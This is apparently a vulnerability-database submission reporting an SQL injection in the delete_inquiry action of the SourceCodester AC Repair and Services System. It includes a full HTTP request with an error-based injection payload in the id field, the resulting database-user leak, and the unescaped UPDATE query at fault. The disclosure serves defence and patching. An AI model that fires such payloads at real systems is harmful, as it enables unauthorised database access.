| 标题 | SourceCodester AC Repair and Services System sql injection in Master.php |
|---|
| 描述 | I find a SQL injection vulnerability in the SourceCodester AC Repair and Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html)
This affect the file /classes/Master.php?f=delete_inquiry:
POST /php-acrss/classes/Master.php?f=delete_inquiry HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2854294418240524322736048278
Content-Length: 913
Origin: http://localhost
Connection: close
Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking
Cookie: PHPSESSID=avms7d982mr3recfih6r7sfun0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="id"
1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="fullname"
111
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="contact"
111
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="address"
111
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="services[]"
1
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="status"
0
-----------------------------2854294418240524322736048278--
And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}". This return value undoubtedly proves the existence of an SQL injection vulnerability here
The vulnerability arises from the usage of the code "sql = "UPDATE inquiry_list set {data} where id = '{$id}' ";" without implementing adequate filtering on the controllable parameter id. This absence of proper filtering exposes the possibility of SQL injection attacks. To address this issue, my recommendation is to safeguard the id parameter against malicious exploitation by utilizing mysqli_real_escape_string(). |
|---|
| 来源 | ⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html |
|---|
| 用户 | L2ncE (UID 50751) |
|---|
| 提交 | 2023-07-14 05時29分 (3 年前) |
|---|
| 管理 | 2023-07-15 09時29分 (1 day later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 234223 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_inquiry 标识符 SQL注入] |
|---|
| 积分 | 20 |
|---|